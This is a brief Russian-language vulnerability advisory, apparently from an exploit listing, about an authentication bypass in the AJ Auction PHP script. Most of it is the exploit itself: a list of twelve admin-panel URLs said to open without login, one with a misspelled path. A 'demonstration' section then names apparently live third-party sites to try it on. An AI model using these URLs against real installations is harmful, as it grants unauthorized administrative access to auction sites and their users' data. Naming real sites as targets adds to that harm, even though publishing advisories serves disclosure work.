Программа: AJ Auction
Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных в множественных сценариях. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.
Эксплоит:
http://localhost/[path]/admin/site.php
http://localhost/[path]/admin/auction.php
http://localhost/[path]/admin/mail.php
http://localhost/[path]/admin/fee_setting.php
http://localhost/[path]/admin/earnings.php
http://localhost/[path]/admin/insertion_fee_settings.php
http://localhost/[path]/admin/custom_category.php
http://localhost/[path]/admin/subcategory.php
http://localhost/[path]/admin/category.php
http://localhost/[path]/admin/report.php
http://localhost/[path]/amdin/store_manager.php
http://localhost/[path]/admin/choose_sell_format.php
Демонстрация:
http://www.ajauctionpro.com/ajauction_platinum/admin/index.php
http://www.tapinglobal.com/admin/
Web2.0
http://www.ajauctionpro.com/auction_web2.0/admin/index.php